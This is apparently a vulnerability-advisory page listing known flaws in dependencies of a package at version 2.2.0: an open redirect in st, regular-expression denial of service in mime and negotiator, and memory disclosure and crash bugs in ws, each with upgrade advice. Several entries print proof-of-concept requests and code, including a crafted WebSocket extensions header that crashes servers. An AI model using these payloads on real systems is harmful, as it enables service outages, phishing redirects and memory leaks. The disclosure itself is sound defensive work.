All the vulnerabilities related to the version 2.2.0 of the package
Open Redirect in st
st is a module for serving static files.
An attacker is able to craft a request that results in an HTTP 301 (redirect) to an entirely different domain.
A request for: http://some.server.com//nodesecurity.org/%2e%2e would result in a 301 to //nodesecurity.org/%2e%2e which most browsers treat as a proper redirect as // is translated into the current schema being used.
Mitigating factor:
In order for this to work, st must be serving from the root of a server (/) rather than the typical sub directory (/static/) and the redirect URL will end with some form of URL encoded .. ("%2e%2e", "%2e.", ".%2e").
Code example (provided by Xin Gao):
[example.js]
var st = require('st')
var http = require('http')
http.createServer(st(process.cwd())).listen(1337)
$ curl -v http://localhost:1337//cve.mitre.com/%2e%2e
* Trying ::1...
* TCP_NODELAY set
* Connected to localhost (::1) port 1337 (#0)
> GET //cve.mitre.com/%2e%2e HTTP/1.1
> Host: localhost:1337
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< cache-control: public, max-age=600
< last-modified: Fri, 13 Oct 2017 22:56:33 GMT
< etag: "16777220-46488904-1507935393000"
< location: //cve.mitre.com/%2e%2e/
< Date: Fri, 13 Oct 2017 22:56:41 GMT
< Connection: keep-alive
< Content-Length: 30
<
* Connection #0 to host localhost left intact
Update to version 1.2.2 or later.
mime Regular Expression Denial of Service when MIME lookup performed on untrusted user input
Affected versions of mime are vulnerable to regular expression denial of service when a mime lookup is performed on untrusted user input.
Update to version 2.0.3 or later.
Regular Expression Denial of Service in negotiator
Affected versions of negotiator are vulnerable to regular expression denial of service attacks, which trigger upon parsing a specially crafted Accept-Language header value.
Update to version 0.6.1 or later.
Remote Memory Disclosure in ws
Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.
In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.
var ws = require('ws')
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')
client.on('open', function () {
console.log('open')
client.ping(50) // this sends a non-zeroed buffer of 50 bytes
client.on('pong', function (data) {
console.log('got pong')
console.log(data) // Data from the client.
})
})
Update to version 1.0.1 or greater.
Denial of Service in ws
Affected versions of ws can crash when a specially crafted Sec-WebSocket-Extensions header containing Object.prototype property names as extension or parameter names is sent.
const WebSocket = require('ws');
const net = require('net');
const wss = new WebSocket.Server({ port: 3000 }, function () {
const payload = 'constructor'; // or ',;constructor'
const request = [
'GET / HTTP/1.1',
'Connection: Upgrade',
'Sec-WebSocket-Key: test',
'Sec-WebSocket-Version: 8',
`Sec-WebSocket-Extensions: ${payload}`,
'Upgrade: websocket',
'\r\n'
].join('\r\n');
const socket = net.connect(3000, function () {
socket.resume();
socket.write(request);
});
});
Update to version 3.3.1 or later.
DoS due to excessively large websocket message in ws
Affected versions of ws do not appropriately limit the size of incoming websocket payloads, which may result in a denial of service condition when the node process crashes after receiving a large payload.
Update to version 1.1.1 or later.
Alternatively, set the maxpayload option for the ws server to a value smaller than 256MB.